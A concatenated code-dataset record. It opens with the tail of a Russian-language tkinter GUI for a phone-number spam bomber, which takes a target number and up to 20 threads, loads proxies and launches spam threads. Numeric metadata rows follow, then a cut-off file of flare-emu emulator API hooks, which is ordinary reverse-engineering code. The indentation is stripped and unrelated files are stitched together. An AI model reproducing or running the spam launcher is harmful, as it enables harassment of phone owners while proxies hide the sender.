spam = spamProxy
try:
if file_name == None:
pass
except:
messagebox.showinfo(title='Warning', message='Не указан файл с proxy')
try:
if len(number) < 12 or file_name == None:
messagebox.showinfo(title='Warning', message='Недостаточно цифр')
else:
messagebox.showinfo(title='GOOD', message='Спам запущен')
for i in range(thrade):
t = threading.Thread(target=spam, args=(number,))
t.start()
except:
pass
else:
spam = spamNOproxy
if len(number) < 12:
messagebox.showinfo(title='Warning', message='Недостаточно цифр')
else:
messagebox.showinfo(title='GOOD', message='Спам запущен')
for i in range(thrade):
t = threading.Thread(target=spam, args=(number,))
t.start()
def fileopen():
global file_name
file_name = fd.askopenfilename(filetypes=(('TXT files', '*.txt'), ('HTML files', '*.html;*.htm'),
('All files', '*.*')))
root.resizable(False, False)
text1 = Text(root, height=1, width=15, font='Arial 14')
text1.pack()
text1.place(x=15, y=25)
text2 = Text(root, height=1, width=2, font='Arial 14')
text2.pack()
text2.place(x=15, y=85)
file = Button(text='Выбрать файл с proxy', command=fileopen)
file.pack()
file.place(x=15, y=120)
file = Button(text='Загрузить proxy из интернета', command=download)
file.pack()
file.place(x=15, y=160)
label1 = Label(text='Введите номер в формате 7XXXXXXXXXX', fg='#912700', bg='#849187')
label1.pack()
label1.place(x=15, y=55)
label2 = Label(text='Потоки (не больше 20)', fg='#912700', bg='#849187')
label2.pack()
label2.place(x=50, y=90)
crack = Button(text='Старт', height=2, width=12, background='green', command=StartThread)
crack.pack()
crack.place(x=215, y=235)
root.mainloop()
| 42.807474
| 683
| 0.543495
| 5,665
| 52,696
| 4.978288
| 0.124272
| 0.053188
| 0.101057
| 0.111694
| 0.892384
| 0.887313
| 0.887313
| 0.880079
| 0.880079
| 0.877101
| 0
| 0.033424
| 0.288599
| 52,696
| 1,230
| 684
| 42.842276
| 0.71887
| 0
| 0
| 0.729626
| 0
| 0.030681
| 0.336028
| 0.03478
| 0.001918
| 0
| 0
| 0
| 0
| 1
| 0.016299
| false
| 0.027804
| 0.010547
| 0.001918
| 0.038351
| 0.011505
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c47012aba36e16d861621b317278fa9877b634ea
| 29,468
|
py
|
Python
|
flare_emu_hooks.py
|
tonybounty/flare-emu
|
1475d1b1f54cec06ab3b8cd97a3aacf05000d2c3
|
[
"Apache-2.0"
] | 5
|
2020-05-24T06:53:03.000Z
|
2021-09-08T09:36:57.000Z
|
flare_emu_hooks.py
|
tonybounty/flare-emu
|
1475d1b1f54cec06ab3b8cd97a3aacf05000d2c3
|
[
"Apache-2.0"
] | null | null | null |
flare_emu_hooks.py
|
tonybounty/flare-emu
|
1475d1b1f54cec06ab3b8cd97a3aacf05000d2c3
|
[
"Apache-2.0"
] | 2
|
2020-05-24T06:53:04.000Z
|
2020-12-28T03:15:32.000Z
|
import flare_emu
# return a fake handle value
def _returnHandleHook(eh, address, argv, funcName, userData):
    """Satisfy a hooked handle-returning API by writing an arbitrary
    non-zero fake handle value into the return register."""
    FAKE_HANDLE = 42
    eh.uc.reg_write(eh.regs["ret"], FAKE_HANDLE)
def _returnParam1Hook(eh, address, argv, funcName, userData):
    """Make the hooked function return its first argument unchanged
    (identity pass-through, e.g. for APIs that return their input pointer)."""
    firstArg = argv[0]
    eh.uc.reg_write(eh.regs["ret"], firstArg)
def _allocMem1Hook(eh, address, argv, funcName, userData):
    """Emulate an allocator whose size is the FIRST argument (e.g. malloc):
    clamp the size, allocate emulator memory, return the new address."""
    size = eh._checkMemSize(argv[0], userData)
    eh.uc.reg_write(eh.regs["ret"], eh.allocEmuMem(size))
def _allocMem2Hook(eh, address, argv, funcName, userData):
    """Emulate an allocator whose size is the SECOND argument:
    clamp the size, allocate emulator memory, return the new address."""
    size = eh._checkMemSize(argv[1], userData)
    eh.uc.reg_write(eh.regs["ret"], eh.allocEmuMem(size))
def _allocMem3Hook(eh, address, argv, funcName, userData):
    """Emulate an allocator whose size is the THIRD argument (e.g. HeapAlloc):
    clamp the size, allocate emulator memory, return the new address."""
    size = eh._checkMemSize(argv[2], userData)
    eh.uc.reg_write(eh.regs["ret"], eh.allocEmuMem(size))
def _callocHook(eh, address, argv, funcName, userData):
    """Emulate calloc(count, size): allocate count*size bytes of emulator
    memory (clamped by _checkMemSize) and return the new address."""
    size = eh._checkMemSize(argv[0] * argv[1], userData)
    eh.uc.reg_write(eh.regs["ret"], eh.allocEmuMem(size))
# deny "in place only" flag
def _heapReAllocHook(eh, address, argv, funcName, userData):
    """Emulate HeapReAlloc(heap, flags, mem, size).

    Fails (returns 0) when the caller demands in-place reallocation, since
    the emulated heap always moves the block.  Otherwise allocates a region
    at least as large as both the old block and the requested size, and
    copies the old contents across when the old block is known.
    """
    HEAP_REALLOC_IN_PLACE_ONLY = 0x10
    if argv[1] & HEAP_REALLOC_IN_PLACE_ONLY:
        # in-place growth is not supported; report failure
        eh.uc.reg_write(eh.regs["ret"], 0)
        return
    newSize = eh._checkMemSize(argv[3], userData)
    oldRegion = eh.getEmuMemRegion(argv[2])
    if oldRegion is None:
        newAddr = eh.allocEmuMem(newSize)
    else:
        oldSize = oldRegion[1] - oldRegion[0]
        newSize = max(oldSize, newSize)
        newAddr = eh.allocEmuMem(newSize)
        eh.copyEmuMem(newAddr, oldRegion[0], oldSize, userData)
    eh.uc.reg_write(eh.regs["ret"], newAddr)
def _reallocHook(eh, address, argv, funcName, userData):
    """Emulate realloc(ptr, size): allocate a region at least as large as
    both the old block and the requested (clamped) size, copying the old
    contents across when the old block is a known emulator region."""
    newSize = eh._checkMemSize(argv[1], userData)
    oldRegion = eh.getEmuMemRegion(argv[0])
    if oldRegion is None:
        newAddr = eh.allocEmuMem(newSize)
    else:
        oldSize = oldRegion[1] - oldRegion[0]
        newSize = max(oldSize, newSize)
        newAddr = eh.allocEmuMem(newSize)
        eh.copyEmuMem(newAddr, oldRegion[0], oldSize, userData)
    eh.uc.reg_write(eh.regs["ret"], newAddr)
# allocate regardless of commit flag, keep a mapping of requested addr -> actual addr
def _virtualAllocHook(eh, address, argv, funcName, userData):
    """Emulate VirtualAlloc(addr, size, ...), ignoring the commit flag.

    Repeated requests for the same address return the previously mapped
    region via eh.allocMap (requested addr -> (actual addr, size)).
    """
    requested = argv[0]
    if requested in eh.allocMap:
        # already serviced this address: hand back the cached mapping
        eh.uc.reg_write(eh.regs["ret"], eh.allocMap[requested][0])
        return
    size = eh._checkMemSize(argv[1], userData)
    actual = eh.allocEmuMem(size, requested)
    eh.allocMap[requested] = (actual, size)
    eh.uc.reg_write(eh.regs["ret"], actual)
# handle same as VirtualAlloc hook, just with different argument placement
def _virtualAllocExHook(eh, address, argv, funcName, userData):
    """Emulate VirtualAllocEx(process, addr, size, ...): identical to the
    VirtualAlloc hook except addr/size are shifted one argument to the
    right by the leading process handle."""
    requested = argv[1]
    if requested in eh.allocMap:
        # already serviced this address: hand back the cached mapping
        eh.uc.reg_write(eh.regs["ret"], eh.allocMap[requested][0])
        return
    size = eh._checkMemSize(argv[2], userData)
    actual = eh.allocEmuMem(size, requested)
    eh.allocMap[requested] = (actual, size)
    eh.uc.reg_write(eh.regs["ret"], actual)
def _memcpyHook(eh, address, argv, funcName, userData):
    """Emulate memcpy(dst, src, n): copy n (clamped) bytes between emulator
    regions, allocating a fresh destination when dst is unmapped, and
    return the destination address.

    Note: argv[0] is rewritten in place when a new destination is allocated
    so later hooks/logging observe the substituted pointer.
    """
    copySize = eh._checkMemSize(argv[2], userData)
    srcRegion = eh.getEmuMemRegion(argv[1])
    dstRegion = eh.getEmuMemRegion(argv[0])
    if dstRegion is None:
        logging.debug("dest memory does not exist for memcpy @%s" % eh.hexString(address))
        dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(copySize))
        argv[0] = dstRegion[0]
    if srcRegion is None:
        logging.debug("source memory does not exist for memcpy @%s" % eh.hexString(address))
    elif copySize <= srcRegion[1] - argv[1] and copySize <= dstRegion[1] - argv[0]:
        eh.copyEmuMem(argv[0], argv[1], copySize, userData)
    else:
        logging.debug("dest memory not large enough @%s" % eh.hexString(address))
    eh.uc.reg_write(eh.regs["ret"], argv[0])
def _strlenHook(eh, address, argv, funcName, userData):
    """Emulate strlen: length of the string at argv[0], or 0 when the
    pointer is not valid emulator memory."""
    if eh.isValidEmuPtr(argv[0]):
        result = len(eh.getEmuString(argv[0]))
    else:
        result = 0
    eh.uc.reg_write(eh.regs["ret"], result)
def _wcslenHook(eh, address, argv, funcName, userData):
    """Emulate wcslen: character count of the UTF-16LE string at argv[0],
    or 0 when the pointer is not valid emulator memory."""
    if eh.isValidEmuPtr(argv[0]):
        result = len(eh.getEmuWideString(argv[0]).decode("utf-16le"))
    else:
        result = 0
    eh.uc.reg_write(eh.regs["ret"], result)
def _strnlenHook(eh, address, argv, funcName, userData):
    """Emulate strnlen: string length capped at argv[1] (clamped by
    _checkMemSize), or 0 when the pointer is not valid emulator memory."""
    maxLen = eh._checkMemSize(argv[1], userData)
    if eh.isValidEmuPtr(argv[0]):
        result = min(len(eh.getEmuString(argv[0])), maxLen)
    else:
        result = 0
    eh.uc.reg_write(eh.regs["ret"], result)
def _wcsnlenHook(eh, address, argv, funcName, userData):
    """Emulate wcsnlen: character count of the UTF-16LE string at argv[0],
    capped at argv[1] (clamped by _checkMemSize); 0 for an invalid pointer.

    Bug fix: the original always wrote the cap (strnlen) to the return
    register, even when the string was shorter than the cap, and its
    `strlen = argv[1]` assignment (using the unchecked argument) was dead.
    Now returns min(actual length, cap), matching _strnlenHook and the
    CRT wcsnlen contract.
    """
    maxLen = eh._checkMemSize(argv[1], userData)
    if eh.isValidEmuPtr(argv[0]):
        strlen = len(eh.getEmuWideString(argv[0]).decode("utf-16le"))
        eh.uc.reg_write(eh.regs["ret"], min(strlen, maxLen))
    else:
        eh.uc.reg_write(eh.regs["ret"], 0)
def _strcmpHook(eh, address, argv, funcName, userData):
    """Emulate strcmp: 0 when both strings are valid and equal; otherwise
    an all-ones pointer-width value (i.e. -1) meaning "not equal"."""
    if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
        if eh.getEmuString(argv[0]) == eh.getEmuString(argv[1]):
            eh.uc.reg_write(eh.regs["ret"], 0)
            return
    notEqual = 0xffffffffffffffff if eh.size_pointer == 8 else 0xffffffff
    eh.uc.reg_write(eh.regs["ret"], notEqual)
def _strncmpHook(eh, address, argv, funcName, userData):
    """Emulate strncmp: compare at most argv[2] (clamped) bytes; 0 when the
    prefixes match, otherwise an all-ones pointer-width "not equal" value."""
    cap = eh._checkMemSize(argv[2], userData)
    if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
        if eh.getEmuString(argv[0])[:cap] == eh.getEmuString(argv[1])[:cap]:
            eh.uc.reg_write(eh.regs["ret"], 0)
            return
    notEqual = 0xffffffffffffffff if eh.size_pointer == 8 else 0xffffffff
    eh.uc.reg_write(eh.regs["ret"], notEqual)
def _stricmpHook(eh, address, argv, funcName, userData):
    """Emulate stricmp: case-insensitive equality check; 0 on match,
    otherwise an all-ones pointer-width "not equal" value."""
    if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
        if eh.getEmuString(argv[0]).lower() == eh.getEmuString(argv[1]).lower():
            eh.uc.reg_write(eh.regs["ret"], 0)
            return
    notEqual = 0xffffffffffffffff if eh.size_pointer == 8 else 0xffffffff
    eh.uc.reg_write(eh.regs["ret"], notEqual)
def _strnicmpHook(eh, address, argv, funcName, userData):
    """Emulate strnicmp: case-insensitive comparison of at most argv[2]
    (clamped) bytes; 0 on match, otherwise all-ones pointer-width value."""
    cap = eh._checkMemSize(argv[2], userData)
    if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
        if eh.getEmuString(argv[0])[:cap].lower() == eh.getEmuString(argv[1])[:cap].lower():
            eh.uc.reg_write(eh.regs["ret"], 0)
            return
    notEqual = 0xffffffffffffffff if eh.size_pointer == 8 else 0xffffffff
    eh.uc.reg_write(eh.regs["ret"], notEqual)
def _wcscmpHook(eh, address, argv, funcName, userData):
    """Emulate wcscmp: decode both operands as UTF-16LE and compare; 0 on
    match, otherwise an all-ones pointer-width "not equal" value."""
    if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
        lhs = eh.getEmuWideString(argv[0]).decode("utf-16le")
        rhs = eh.getEmuWideString(argv[1]).decode("utf-16le")
        if lhs == rhs:
            eh.uc.reg_write(eh.regs["ret"], 0)
            return
    notEqual = 0xffffffffffffffff if eh.size_pointer == 8 else 0xffffffff
    eh.uc.reg_write(eh.regs["ret"], notEqual)
def _wcsncmpHook(eh, address, argv, funcName, userData):
    """Emulate wcsncmp: compare at most argv[2] (clamped) UTF-16LE
    characters; 0 on match, otherwise all-ones pointer-width value."""
    cap = eh._checkMemSize(argv[2], userData)
    if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
        lhs = eh.getEmuWideString(argv[0]).decode("utf-16le")
        rhs = eh.getEmuWideString(argv[1]).decode("utf-16le")
        if lhs[:cap] == rhs[:cap]:
            eh.uc.reg_write(eh.regs["ret"], 0)
            return
    notEqual = 0xffffffffffffffff if eh.size_pointer == 8 else 0xffffffff
    eh.uc.reg_write(eh.regs["ret"], notEqual)
def _wcsicmpHook(eh, address, argv, funcName, userData):
    """Emulate wcsicmp: case-insensitive UTF-16LE comparison; 0 on match,
    otherwise an all-ones pointer-width "not equal" value."""
    if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
        lhs = eh.getEmuWideString(argv[0]).decode("utf-16le")
        rhs = eh.getEmuWideString(argv[1]).decode("utf-16le")
        if lhs.lower() == rhs.lower():
            eh.uc.reg_write(eh.regs["ret"], 0)
            return
    notEqual = 0xffffffffffffffff if eh.size_pointer == 8 else 0xffffffff
    eh.uc.reg_write(eh.regs["ret"], notEqual)
def _wcsnicmpHook(eh, address, argv, funcName, userData):
    """Emulate wcsnicmp: case-insensitive comparison of at most argv[2]
    (clamped) UTF-16LE characters; 0 on match, else all-ones value."""
    cap = eh._checkMemSize(argv[2], userData)
    if eh.isValidEmuPtr(argv[0]) and eh.isValidEmuPtr(argv[1]):
        lhs = eh.getEmuWideString(argv[0]).decode("utf-16le")
        rhs = eh.getEmuWideString(argv[1]).decode("utf-16le")
        if lhs[:cap].lower() == rhs[:cap].lower():
            eh.uc.reg_write(eh.regs["ret"], 0)
            return
    notEqual = 0xffffffffffffffff if eh.size_pointer == 8 else 0xffffffff
    eh.uc.reg_write(eh.regs["ret"], notEqual)
def _strcpyHook(eh, address, argv, funcName, userData):
    """Emulates strcpy: copies the NUL-terminated source string to the
    destination and returns the destination pointer; writes -1 (all-ones
    for the pointer width) on failure."""
    if eh.isValidEmuPtr(argv[1]):
        data = eh.getEmuString(argv[1]) + b"\x00"
        region = eh.getEmuMemRegion(argv[0])
        if region is None:
            # destination is unmapped: back it with a fresh allocation
            logging.debug("dest memory does not exist for strcpy @%s" % eh.hexString(address))
            region = eh.getEmuMemRegion(eh.allocEmuMem(len(data)))
            argv[0] = region[0]
        if len(data) <= region[1] - argv[0]:
            eh.writeEmuMem(argv[0], data)
            eh.uc.reg_write(eh.regs["ret"], argv[0])
            return
        logging.debug("dest memory not large enough @%s" % eh.hexString(address))
    # failure: report -1 for the pointer width
    eh.uc.reg_write(eh.regs["ret"], (1 << (eh.size_pointer * 8)) - 1)
def _strncpyHook(eh, address, argv, funcName, userData):
    """Emulates strncpy(dest, src, n): copies at most n bytes of src into
    dest, zero-padding when src is shorter than n, and returns dest; writes
    -1 (all-ones for the pointer width) on failure.

    Bug fix: when the source was LONGER than n, the previous code wrote the
    entire source string; strncpy must never copy more than n bytes, so the
    source is now truncated to n before the write.
    """
    if eh.isValidEmuPtr(argv[1]):
        strnlen = eh._checkMemSize(argv[2], userData)
        src = eh.getEmuString(argv[1])
        dstRegion = eh.getEmuMemRegion(argv[0])
        if dstRegion is None:
            logging.debug("dest memory does not exist for strncpy @%s" % eh.hexString(address))
            dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(strnlen))
            argv[0] = dstRegion[0]
        if strnlen <= dstRegion[1] - argv[0]:
            # truncate to n bytes and zero-fill the remainder, per strncpy semantics
            eh.writeEmuMem(argv[0], src[:strnlen].ljust(strnlen, b"\x00"))
            eh.uc.reg_write(eh.regs["ret"], argv[0])
            return
        else:
            logging.debug("dest memory not large enough @%s" % eh.hexString(address))
    if eh.size_pointer == 8:
        val = 0xffffffffffffffff
    else:
        val = 0xffffffff
    eh.uc.reg_write(eh.regs["ret"], val)
def _strncpysHook(eh, address, argv, funcName, userData):
    """Emulates strncpy_s(dest, destsz, src, count): copies the source
    string plus a terminating NUL into dest and writes 0 on success, -1
    (all-ones for the pointer width) on failure."""
    if eh.isValidEmuPtr(argv[2]):
        count = eh._checkMemSize(argv[3], userData)
        data = eh.getEmuString(argv[2])
        region = eh.getEmuMemRegion(argv[0])
        if region is None:
            logging.debug("dest memory does not exist for strncpy_s @%s" % eh.hexString(address))
            region = eh.getEmuMemRegion(eh.allocEmuMem(count))
            argv[0] = region[0]
        count = min(count, len(data))
        # NOTE(review): the full source (not data[:count]) is written, matching
        # the original implementation; only the capacity check uses count
        if count + 1 <= region[1] - argv[0]:
            eh.writeEmuMem(argv[0], data + b"\x00")
            eh.uc.reg_write(eh.regs["ret"], 0)
            return
        logging.debug("dest memory not large enough @%s" % eh.hexString(address))
    # failure: report -1 for the pointer width
    eh.uc.reg_write(eh.regs["ret"], (1 << (eh.size_pointer * 8)) - 1)
def _wcscpyHook(eh, address, argv, funcName, userData):
    """Emulates wcscpy: copies the wide source string plus its 2-byte NUL
    terminator to the destination and returns the destination pointer;
    writes -1 (all-ones for the pointer width) on failure."""
    if eh.isValidEmuPtr(argv[1]):
        data = eh.getEmuWideString(argv[1]) + b"\x00\x00"
        region = eh.getEmuMemRegion(argv[0])
        if region is None:
            # destination is unmapped: back it with a fresh allocation
            logging.debug("dest memory does not exist for wcscpy @%s" % eh.hexString(address))
            region = eh.getEmuMemRegion(eh.allocEmuMem(len(data)))
            argv[0] = region[0]
        if len(data) <= region[1] - argv[0]:
            eh.writeEmuMem(argv[0], data)
            eh.uc.reg_write(eh.regs["ret"], argv[0])
            return
        logging.debug("dest memory not large enough @%s" % eh.hexString(address))
    # failure: report -1 for the pointer width
    eh.uc.reg_write(eh.regs["ret"], (1 << (eh.size_pointer * 8)) - 1)
def _wcsncpyHook(eh, address, argv, funcName, userData):
    """Emulates wcsncpy(dest, src, n): copies at most n wide characters
    (argv[2] * 2 bytes) of src into dest, zero-padding when src is shorter,
    and returns dest; writes -1 (all-ones for the pointer width) on failure.

    Bug fix: when the source was longer than n characters, the previous
    code wrote the entire source string; wcsncpy must never copy more than
    n characters, so the source is now truncated before the write.
    """
    if eh.isValidEmuPtr(argv[1]):
        # byte count: argv[2] is a count of 2-byte wide characters
        strnlen = eh._checkMemSize(argv[2] * 2, userData)
        src = eh.getEmuWideString(argv[1])
        dstRegion = eh.getEmuMemRegion(argv[0])
        if dstRegion is None:
            logging.debug("dest memory does not exist for wcsncpy @%s" % eh.hexString(address))
            dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(strnlen))
            argv[0] = dstRegion[0]
        if strnlen <= dstRegion[1] - argv[0]:
            # truncate to the requested byte length and zero-fill the remainder
            eh.writeEmuMem(argv[0], src[:strnlen].ljust(strnlen, b"\x00"))
            eh.uc.reg_write(eh.regs["ret"], argv[0])
            return
        else:
            logging.debug("dest memory not large enough @%s" % eh.hexString(address))
    if eh.size_pointer == 8:
        val = 0xffffffffffffffff
    else:
        val = 0xffffffff
    eh.uc.reg_write(eh.regs["ret"], val)
def _wcsncpysHook(eh, address, argv, funcName, userData):
    """Emulates wcsncpy_s(dest, destsz, src, count): copies at most count
    wide characters of src plus a 2-byte NUL into dest; writes 0 on
    success, -1 (all-ones for the pointer width) on failure."""
    if eh.isValidEmuPtr(argv[2]):
        # byte count: argv[3] is a count of 2-byte wide characters
        count = eh._checkMemSize(argv[3] * 2, userData)
        data = eh.getEmuWideString(argv[2])
        region = eh.getEmuMemRegion(argv[0])
        if region is None:
            logging.debug("dest memory does not exist for wcsncpy_s @%s" % eh.hexString(address))
            region = eh.getEmuMemRegion(eh.allocEmuMem(count))
            argv[0] = region[0]
        count = min(count, len(data))
        if count + 2 <= region[1] - argv[0]:
            eh.writeEmuMem(argv[0], data[:count] + b"\x00\x00")
            eh.uc.reg_write(eh.regs["ret"], 0)
            return
        logging.debug("dest memory not large enough @%s" % eh.hexString(address))
    # failure: report -1 for the pointer width
    eh.uc.reg_write(eh.regs["ret"], (1 << (eh.size_pointer * 8)) - 1)
def _memchrHook(eh, address, argv, funcName, userData):
    """Emulates memchr: writes the address of the first occurrence of byte
    argv[1] within the argv[2]-byte buffer at argv[0], or 0 if not found.

    Bug fix: the needle was built with chr(), producing a str; uc.mem_read
    returns a bytearray, and bytearray.find(str) raises TypeError on
    Python 3. The needle is now a bytes object.
    """
    dstRegion = eh.getEmuMemRegion(argv[0])
    if dstRegion is not None:
        srch = bytes([argv[1] & 0xFF])
        srchlen = argv[2]
        # truncate search to end of region
        if argv[0] + srchlen > dstRegion[1]:
            srchlen = dstRegion[1] - argv[0]
        buf = eh.uc.mem_read(argv[0], srchlen)
        offs = buf.find(srch)
        if offs > -1:
            eh.uc.reg_write(eh.regs["ret"], argv[0] + offs)
            return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _mbtowcHook(eh, address, argv, funcName, userData):
    """Emulates mbtowc: converts the first narrow character at argv[1] to a
    NUL-terminated wide character at argv[0] and writes 1 to the return
    register, or 0 on failure.

    Bug fix: an empty source string previously raised IndexError on the
    [0] subscript and aborted emulation; it now falls through to the
    0 return (converting an empty/NUL input yields nothing).
    """
    if eh.isValidEmuPtr(argv[1]):
        decoded = eh.getEmuString(argv[1]).decode("latin1")
        if decoded:
            src = decoded[0]
            dstRegion = eh.getEmuMemRegion(argv[0])
            if dstRegion is None:
                logging.debug("dest memory does not exist for mbtowc variant @%s" % eh.hexString(address))
                dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(0x1000))
                argv[0] = dstRegion[0]
            eh.writeEmuMem(argv[0], src.encode("utf-16le")[0:2] + b"\x00\x00")
            eh.uc.reg_write(eh.regs["ret"], 1)
            return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _mbstowcsHook(eh, address, argv, funcName, userData):
    """Emulates mbstowcs: converts up to argv[2] characters of the narrow
    string at argv[1] to UTF-16LE at argv[0]; writes the number of non-NUL
    characters converted to the return register, or 0 on failure."""
    if eh.isValidEmuPtr(argv[1]):
        maxBytes = eh._checkMemSize(argv[2] * 2, userData)
        data = eh.getEmuString(argv[1])
        if len(data) < argv[2]:
            # whole string fits: include a NUL terminator in the count
            data += b"\x00"
        else:
            data = data[:argv[2]]
        region = eh.getEmuMemRegion(argv[0])
        if region is None:
            logging.debug("dest memory does not exist for mbtowc variant @%s" % eh.hexString(address))
            region = eh.getEmuMemRegion(eh.allocEmuMem(maxBytes))
            argv[0] = region[0]
        if len(data) * 2 + 2 <= region[1] - argv[0]:
            eh.writeEmuMem(argv[0], data.decode("latin1").encode("utf-16le") + b"\x00\x00")
            eh.uc.reg_write(eh.regs["ret"], len(data.replace(b"\x00", b"")))
            return
        logging.debug("dest memory not large enough @%s" % eh.hexString(address))
    eh.uc.reg_write(eh.regs["ret"], 0)
def _wctombHook(eh, address, argv, funcName, userData):
    """Emulates wctomb: converts the first wide character at argv[1] to a
    single narrow byte at argv[0] and writes 1 to the return register, or
    0 on failure.

    Bug fix: the previous code wrote the full 2-byte UTF-16 code unit into
    the multibyte destination; wctomb must emit a narrow character, so only
    the low byte of the code unit is written now. Also guards against an
    empty source string, which previously raised IndexError.
    """
    if eh.isValidEmuPtr(argv[1]):
        src = eh.getEmuWideString(argv[1]).decode("utf-16le")
        if src:
            dstRegion = eh.getEmuMemRegion(argv[0])
            if dstRegion is None:
                logging.debug("dest memory does not exist for wctomb variant @%s" % eh.hexString(address))
                dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(0x1000))
                argv[0] = dstRegion[0]
            # one narrow byte: the low byte of the UTF-16LE code unit
            eh.writeEmuMem(argv[0], src[0].encode("utf-16le")[:1])
            eh.uc.reg_write(eh.regs["ret"], 1)
            return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _wcstombsHook(eh, address, argv, funcName, userData):
    """Emulates wcstombs: converts up to argv[2] wide characters at argv[1]
    to a narrow (one byte per character) string at argv[0] and writes the
    number of non-NUL characters converted, or 0 on failure.

    Bug fix: the output was previously encoded as UTF-16LE, i.e. the wide
    string was copied unchanged into the multibyte destination; wcstombs
    must emit narrow characters, so the low byte of each UTF-16 code unit
    is written instead.
    """
    if eh.isValidEmuPtr(argv[1]):
        bufSize = eh._checkMemSize(argv[2], userData)
        src = eh.getEmuWideString(argv[1]).decode("utf-16le")
        if len(src) < argv[2]:
            src += "\x00"
        else:
            src = src[:argv[2]]
        dstRegion = eh.getEmuMemRegion(argv[0])
        if dstRegion is None:
            logging.debug("dest memory does not exist for wctomb variant @%s" % eh.hexString(address))
            dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(bufSize))
            argv[0] = dstRegion[0]
        if bufSize + 1 <= dstRegion[1] - argv[0]:
            if bufSize > len(src):
                src = src.ljust(bufSize, "\x00")
            # one byte per character: keep the low byte of each UTF-16 code unit
            eh.writeEmuMem(argv[0], (src + "\x00").encode("utf-16le")[::2])
            eh.uc.reg_write(eh.regs["ret"], len(src.replace("\x00", "")))
            return
        else:
            logging.debug("dest memory not large enough @%s" % eh.hexString(address))
    eh.uc.reg_write(eh.regs["ret"], 0)
def _multiByteToWideCharHook(eh, address, argv, funcName, userData):
    """Emulates MultiByteToWideChar(cp, flags, src, srcLen, dst, dstLen).

    Converts the narrow string at argv[2] to UTF-16LE at argv[4]. Per the
    Win32 contract the return value is a count of wide CHARACTERS; when
    argv[5] (cchWideChar) is 0 only the required size is returned and
    nothing is written.

    Bug fix: the size-query path previously returned len(src) * 2 (a byte
    count); the API returns the size in characters, which also matches the
    count returned by the write path below.
    """
    if eh.isValidEmuPtr(argv[2]):
        src = eh.getEmuString(argv[2])
        srcLen = eh.getSignedValue(argv[3])
        if srcLen == -1:
            # srcLen of -1 means "NUL-terminated": include the terminator
            src += b"\x00"
            maxBufSize = eh._checkMemSize(len(src) * 2, userData)
        else:
            maxBufSize = eh._checkMemSize(srcLen * 2, userData)
        if len(src) < srcLen:
            src += b"\x00"
        elif srcLen != -1:
            src = src[:srcLen]
        if argv[5] == 0:
            # size query: required size in characters, not bytes
            eh.uc.reg_write(eh.regs["ret"], len(src))
            return
        dstRegion = eh.getEmuMemRegion(argv[4])
        if dstRegion is None:
            logging.debug("dest memory does not exist for mbtowc variant @%s" % eh.hexString(address))
            dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(maxBufSize))
            argv[4] = dstRegion[0]
        if len(src) * 2 + 2 <= dstRegion[1] - argv[4]:
            eh.writeEmuMem(argv[4], src.decode("latin1").encode("utf-16le") + b"\x00\x00")
            eh.uc.reg_write(eh.regs["ret"], len(src))
            return
        else:
            logging.debug("dest memory not large enough @%s" % eh.hexString(address))
    eh.uc.reg_write(eh.regs["ret"], 0)
def _wideCharToMultiByteHook(eh, address, argv, funcName, userData):
    """Emulates WideCharToMultiByte(cp, flags, src, srcLen, dst, dstLen).

    Converts the UTF-16LE string at argv[2] to a narrow string at argv[4]
    and returns the number of bytes written; when argv[5] (cbMultiByte) is
    0 only the required byte count is returned.

    Fix: the debug message said "mbtowc variant" for this wide-to-narrow
    conversion; it now says "wctomb variant" to match the direction and the
    other narrow-output hooks.
    """
    if eh.isValidEmuPtr(argv[2]):
        src = eh.getEmuWideString(argv[2]).decode("utf-16le")
        srcLen = eh.getSignedValue(argv[3])
        if srcLen == -1:
            # srcLen of -1 means "NUL-terminated": include the terminator
            src += "\x00"
            maxBufSize = eh._checkMemSize(len(src), userData)
        else:
            maxBufSize = eh._checkMemSize(srcLen, userData)
        if len(src) < srcLen:
            src += "\x00"
        elif srcLen != -1:
            src = src[:srcLen]
        if argv[5] == 0:
            # size query: required size in bytes
            eh.uc.reg_write(eh.regs["ret"], len(src))
            return
        dstRegion = eh.getEmuMemRegion(argv[4])
        if dstRegion is None:
            logging.debug("dest memory does not exist for wctomb variant @%s" % eh.hexString(address))
            dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(maxBufSize))
            argv[4] = dstRegion[0]
        if len(src) + 1 <= dstRegion[1] - argv[4]:
            # NOTE(review): characters above U+00FF will raise on latin1
            # encode and abort the hook — TODO confirm acceptable
            eh.writeEmuMem(argv[4], (src + "\x00").encode("latin1"))
            eh.uc.reg_write(eh.regs["ret"], len(src))
            return
        else:
            logging.debug("dest memory not large enough @%s" % eh.hexString(address))
    eh.uc.reg_write(eh.regs["ret"], 0)
def _memsetHook(eh, address, argv, funcName, userData):
    """Emulates memset: fills argv[2] bytes at argv[0] with the byte value
    argv[1] and writes the destination pointer to the return register."""
    count = eh._checkMemSize(argv[2], userData)
    region = eh.getEmuMemRegion(argv[0])
    fill = chr(argv[1] & 0xFF).encode("latin1")
    if region is None:
        # destination is unmapped: back it with a fresh allocation
        logging.debug("dest memory does not exist for memset @%s" % eh.hexString(address))
        region = eh.getEmuMemRegion(eh.allocEmuMem(count))
        argv[0] = region[0]
    if count <= region[1] - argv[0]:
